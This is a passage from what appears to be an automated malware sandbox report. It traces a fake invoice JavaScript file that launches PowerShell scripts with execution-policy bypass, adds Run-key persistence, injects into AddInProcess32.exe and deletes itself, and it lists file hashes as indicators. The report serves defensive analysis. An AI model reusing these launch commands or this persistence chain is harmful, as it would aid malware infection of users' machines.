              PID:2128
            • C:\Windows\SYSTEM32\cmd.exe
              cmd.exe /c "powershell.exe Start-Sleep -Seconds 1 ; powershell.exe -ExecutionPolicy Bypass -file 'C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\qnvpd.ps1'"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:4384
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell.exe Start-Sleep -Seconds 1 ; powershell.exe -ExecutionPolicy Bypass -file 'C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\qnvpd.ps1'
                5⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:812
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\qnvpd.ps1"
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Adds Run key to start application
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:60
            • C:\Windows\SYSTEM32\cmd.exe
              cmd.exe /c "powershell.exe Start-Sleep -Seconds 1 ; powershell.exe -ExecutionPolicy Bypass -file 'C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\ireyr.ps1'"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:556
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell.exe Start-Sleep -Seconds 1 ; powershell.exe -ExecutionPolicy Bypass -file 'C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\ireyr.ps1'
                5⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:3120
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\ireyr.ps1"
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Adds Run key to start application
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3544
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\icefh.ps1"
              4⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • Suspicious use of SetThreadContext
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:3524
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell.exe Start-Sleep -Seconds 1 ; powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\pesister.ps1"
                5⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:4084
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\pesister.ps1
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:3020
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\ireyr.ps1"
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Adds Run key to start application
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4600
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\ireyr.ps1"
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Adds Run key to start application
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4660
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\ireyr.ps1"
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Adds Run key to start application
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3620
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\ireyr.ps1"
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Adds Run key to start application
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4092
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\ireyr.ps1"
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Adds Run key to start application
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3744
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\ireyr.ps1"
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Adds Run key to start application
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3988
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\ireyr.ps1"
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Adds Run key to start application
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:208
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\ireyr.ps1"
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Adds Run key to start application
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1504
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\ireyr.ps1"
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4592
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                5⤵
                  PID:3616
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                  5⤵
                  • Adds Run key to start application
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: GetForegroundWindowSpam
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of SetWindowsHookEx
                  PID:3008
              • C:\Windows\SYSTEM32\cmd.exe
                cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\INCENTIVES LAST WEEK CREDIT NOTE-OCT2024.js"
                4⤵
                  PID:1724

          Network

          MITRE ATT&CK Enterprise v15

          Downloads

          • C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\icefh.ps1
            Filesize: 835KB
            MD5: c531cf30a3f52fad2b85f1544b2b8451
            SHA1: e50797aab81c641489e5116f2c63501aa785e4d7
            SHA256: b63a5a3bc89ef97bfc9c0ac782c5d5bb7aad9f2c05cd7d706814666d4ae8abe6
            SHA512: cb88e2f649df436e24f22e22f5878df6921b2acb0ec981c8b46087558a24a5a7a3b010e2719633c002529104d9956cabe00e90a9555871708037ebf035c220e7

          • C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\ireyr.ps1
            Filesize: 431B
            MD5: c95dcffaad056a389e2262623f45e739
            SHA1: f1b5b346c97b1c37c760da0c5b0f4a5b64a2ce59
            SHA256: 22464fa37f28b5fe0c442a8b61e23fe5cf953d5d5d24070078270d451c65f7ca
            SHA512: 95393f26191d67132ffb236716abf673b1e898eada161f0534c24cf36e333eae0c31ef49aa3078b51389ae21b38dd1052ca808e695848fc6cce7d06cc57e6862

          • C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\qnvpd.ps1
            Filesize: 426B
            MD5: 6fd7aeb823774dfec9be79c9afa1024b
            SHA1: 36b97d58c3cb956e1975b643eb275cb798588a25
            SHA256: 7b65708c0c71857c909140973259cd2ac18d7368513109553ef97d65b323917e
            SHA512: 13c732c308497fd51592c64737726263027f4ae91ad37716c525c0cdb21024c43eb9975e576f75a093f8b39cc0c06276b88cf803aa79af029f5bcc8baaec9362

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
            Filesize: 3KB
            MD5: 223bd4ae02766ddc32e6145fd1a29301
            SHA1: 900cfd6526d7e33fb4039a1cc2790ea049bc2c5b
            SHA256: 1022ec2fed08ff473817fc53893e192a8e33e6a16f3d2c8cb6fd37f49c938e1e
            SHA512: 648cd3f8a89a18128d2b1bf960835e087a74cdbc783dbfcc712b3cb9e3a2e4f715e534ba2ef81d89af8f60d4882f6859373248c875ceb26ad0922e891f2e74cc

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize: 1KB
            MD5: 169e59a236ee5f087221634184f9e431
            SHA1: 5aff2937073d1fa3cd2b377a3f0c631502f52174
            SHA256: 932e7b66f3df82d1e44e6e59b1a8adaa13f50f80388dcc5a2bcc06a148a94975
            SHA512: c0ccc2f187e51caa50ae0cad311e67c276a400446cc90bc7ba485d1f9e456ae5d4e9f254f947205c94a44b92b8e836f93b4799bd1ef1dd0dc9997c8c7e4c37ab

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize: 1KB
            MD5: e87c8fca81877e269e81d938fece2852
            SHA1: f1fbbd4e2843c3c175ea3bdd3bc4e21a9941963b
            SHA256: 255987484eb604da58b52aa81814daa5b8d94457662d20e3d018b58d7a2cc9c0
            SHA512: be75ce1ad00df9fe5f38b95701b5a06be8ca542d622fe704488f672281adfb57f2b58f5194cfe4a44bc4369a8c12393bff246af6ebe66b159787f73186c8da2b

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize: 948B
            MD5: c1a54dd5a1ab44cc4c4afd42f291c863
            SHA1: b77043ab3582680fc96192e9d333a6be0ae0f69d
            SHA256: c6dce870a896f3531ae7a10a0c2096d2eb7eb5989ae783aefea6150279502d75
            SHA512: 010f5093f58b0393d17c824a357513cf4f06239ccddd86c2e0581347ef3b8e7b93f869b0770bdaeb000e4fda7e14f49b9e45663a3839ab049446e9fe08ec535d

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize: 64B
            MD5: 367b1c81198bfdcdba813c2c336627a3
            SHA1: 37fe6414eafaaed4abb91c1aafde62c5b688b711
            SHA256: 1141e163d84d5ef0038593c866647f27c55510de2147dc1578130e518a22cced
            SHA512: e0493957e6602efb156d372e5e66147056f6e3c2e01996ba9b4e04f82b2b1e4c7236d0e3681dce9ab4911a62546b6a141f1ae731de6e8184e758caf120cf594b

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize: 1KB
            MD5: 2465e6dcb39dbbb0d548ee8dd9b5e5db
            SHA1: ba4d05bee0f2b198cb510e7ddbea36c3aaa9d5f3
            SHA256: 268fd499c283349bec2a87bc99cb6ddf61aba940b3417f3ec438595f8c93c44e
            SHA512: 43e9080271a9c170d10f18537fd95570968bcb4d758584566e7976893cb3130a1fd690a52f341c9fd4037f81a3e05ff4271a29bbb6e3a19aeb3886b4357c92d0

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize: 1KB
            MD5: 04c9ebf9c23c1d4d4a08c16e20fcceed
            SHA1: 67044e3f04584acefef2e09c2584e22e70fc5df4
            SHA256: 5ba65623b2739407ddd1fa8d75335ee54a3575893bc6a226182972c1ef881e58
            SHA512: 84cf13081ef3162995557677cfdae002ab7af81cf53ca874fbb046aa26facc375f8b533e6d2899240b3bdb06d26c6b322b60c4eca9a2a9570c54ba6d0350cd69

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize: 1KB
            MD5: 693baf43e3d5fefa0883380c7a77c69a
            SHA1: f3e6115432504e8bd401d8c0ff2da43e708707e5
            SHA256: 27a3015931d1f72ce982cf8f9d38dc99219ea2bb9bda4ec7b09dca9bd1122e9e
            SHA512: 29c5e093f3f86c38246fe5f1c5d6110f315937916f139289f52dbbb1e67d4f5f46e4cc928ff03ce19b91cf1d8310d40dadc65812399829da8c94f0c6f9e3f5cc

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize: 1KB
            MD5: a68fcc3482ebb381cd7eb80d4dfc7ac9
            SHA1: 68f694b1b7999996678244d8ef9d95f520ec2e39
            SHA256: 1bfbb143c70207d28f8266d08a28e052467ad0eab48c65c19ba8636d44093ea0
            SHA512: a8a5cc66e81ebb417dcd216541690a31913f8a9cbe676b76ac451c009540ef33558dba762da1736c0f61fb36dfaa71f0926ac1ab8919a892a8ab49087999a2d8

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize: 1KB
            MD5: 012245604d1f9b30879904558e292da8
            SHA1: e48ed6db7b52f6de8287fc5d7f6ea100326adfdc
            SHA256: 0f7c853bc431a078e6c661be3ac34d9bd0d2ac533f49eda183887122dfc02f0c
            SHA512: 78506118229cbcd2195b029912e769d1e2715471a24431a772c7a663493c9dccef8738bae29ca8ac0d227a2ace3f902fd9ec018fa5be3faa137efe19c1c51d10

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize: 1KB
            MD5: 331841fe482ffe8b1cc1509733d8ca67
            SHA1: 1e3257cca1b2c7c3aaf4cf1f138c9e9e665e8cb8
            SHA256: 14112a43248df71bdf7668c923f541190c6417ef37796605cf8114f565648d0f
            SHA512: 039e5991132912f94b3fbe23146ee61bb822aada6a3f2b37bca226c76c162e04a106f3626587ff079411a03e6e9a4813ad04813ada4694f9b78f49e1925389d9

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize: 1KB
            MD5: 1536159346e9a2061e905bb38ac9fd35
            SHA1: eff17db4721dc0add117ed399b839130d27675d4
            SHA256: 6b0eebfc544130c7a8f7d0e45c8e0b86748c13b528bc9948f216a76d8be2b88f
            SHA512: fab6f66ac2bc68e2a82199da2519c7aae2d629603450175b69336097111e57f49fbea8b3903f7a106150032d8e5c653a90f681a10d7be668bff2bcdb798eb4ee

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize: 1KB
            MD5: 1ef85a547edc27c13271009c36d9a8de
            SHA1: 84197cd759db579e2e4bd7c03aa4de36b515c1fd
            SHA256: c2c5895f3a9356b6be3feeeb3ce2878d498ab230370532189f1156a9f848a14d
            SHA512: 65cf5104560f49b9a6dba0d901db4529ef416202eed3fcf6b28be86f8fb4cddc931400be8d4723198750226123d2a711dba83166dbe4c507ffcbcf8f5ecbcb41

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize: 944B
            MD5: ce4ba855ff084f34700780c7ef93027a
            SHA1: 6bc10ecf8bacc5e9f4110154fa755d2c2869878c
            SHA256: 2195b737a8f8b6cf33ca2489c555b0717cb3f199b349a88a8d3aa92579f155d1
            SHA512: 8d02efee2f6a77f199403b340b333452c3f53222f2d692beeaf405fc39bdb583242cfbdb38ff13b98267fa93ed20a4335b16ad13b0ecbca9bb9fde3ca4f9243f

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ndxmt4b5.ljn.ps1
            Filesize: 60B
            MD5: d17fe0a3f47be24a6453e9ef58c94641
            SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
            SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
            SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • C:\Users\Admin\AppData\Local\Temp\dll01.txt
            Filesize: 26B
            MD5: 1412b18e5013007f061640d90f2fb329
            SHA1: d8b21231fd33ff936867507f11f74cdb6f3bf157
            SHA256: 3abb143c813b1842913dfbc64d371413a04945ec8158fbd89108f4e15d00e209
            SHA512: 5dd96c91cac29755a528246f215f0250821d49384fceb8cca68a6e5728dbec040cf5e03df697e05921613e35f38a31353c63caa988ded9562b941ebbb74e06d3

          • C:\Users\Admin\AppData\Local\Temp\dll01.txt
            Filesize: 52KB
            MD5: fc24a123e142a55818afb0a8e86a1b5f
            SHA1: 5a000b63aac745adf898a85ac82fb72a14144e10
            SHA256: 0518b272f1942016ff4d1e919e50f1a1149c980a41de9c1b7964f4abe8d5f522
            SHA512: 1398c9e6ba60663e8d7b16cf72b083079235e22a74ae1c53dd8eaff479eaa512c390e63bed6c136f11b9613d129f144b270e6e59c01363080cbd4fa28b0e4500

          • C:\Users\Admin\AppData\Roaming\pesister.ps1
            Filesize: 231B
            MD5: 5b22a01655beb09d379869b1784a46ac
            SHA1: f97528b16ca841dd35f735e9845a43d03c8313b9
            SHA256: 384cec4d0e386a508b76421bb8d24044b4691957abf3a0f968b2bb2a30716f32
            SHA512: 091681d4fd923616936f57a52240764be7ce8467a6266272b558ba80e523c83f72e1c53c392087822bd313ef7438e4e43e7d735f402a2fb92bddff907940522d
